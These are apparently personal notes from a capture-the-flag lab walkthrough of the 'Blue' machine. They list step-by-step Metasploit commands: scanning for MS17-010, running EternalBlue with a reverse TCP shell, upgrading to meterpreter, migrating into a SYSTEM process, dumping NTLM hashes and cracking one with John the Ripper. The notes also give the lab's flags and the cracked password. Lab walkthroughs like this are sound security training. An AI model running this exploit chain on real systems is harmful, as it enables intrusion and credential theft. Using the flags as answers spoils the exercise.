Blue Exploit
Recon
s1: nmap -sV -sC --script vuln -oN blue.nmap 10.10.95.33 | vulnerability scan , ms17-010)
Exploit / Gain Access
s2: start metasploit | msfconsole
s3: search exploit ms17-010 | select use 0 | exploit/windows/smb/ms17_010_eternalblue
s4: show options > set RHOSTS 10.10.95.33
s5: show payloads | use 55 payload/windows/x64/shell/reverse_tcp
s6: set payload 55
s7: run exploit | run command = C:\Windows\system32>
s8: background the shell | Ctrl + Z
Escalate
s9: upgrade shell to meterpreter = shell_to_meterpreter > use multi/manage/shell_to_meterpreter | https://null-byte.wonderhowto.com/how-to/upgrade-normal-command-shell-metasploit-meterpreter-0166013/
show options > set sessions | set session 1 > run exploit
select that session for use | sessions -u 1 to upgrade session
run sessions - to see all running sessions
use session 2: to select session 2 ( meterpreter)
run shell to return to windows command line to verify escalation> run whoami to verify system name > background shell to retrun to meterpreter shell
s10: List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id
1292 704 spoolsv.exe x64 0 NT AUTHORITY\SYST C:\Windows\System3
s11: Migrate to this process | migrate 1292
Cracking
s12: Dump the non-default user's password and crack it!
hashdump Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
s13: Crack the password Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::
save password into a .txt file = hash.txt
search password in https://www.tunnelsup.com/hash-analyzer/ to determine hash type or format
using john the ripper run the command
john --format=NT --w=/usr/share/wordlists/rockyou.txt '/root/hash.txt' | password = alqfna22
Finding flags
Flag 1:
cd C:/ > cat flag1.txt
flag: flag{access_the_machine}
Falg 2:
google windows sam file location | c:\Windows\System32\config\flag2.txt
cd C://Windows/System32/config > cat flag2.txt OR
cat 'c:\Windows\System32\config\flag2.txt'
flag: flag{sam_database_elevated_access}
Flag 3:
Alternatively we can use meterpreter search funtion to search file location
search -f flag*.txt | c:\Users\Jon\Documents\flag3.txt
cat file location with 2 \\ or ' '| cat :\\Users\\Jon\\Documents\\flag3.txt | cat 'c:\Users\Jon\Documents\flag3.txt'
cat flag3.txt |
Last updated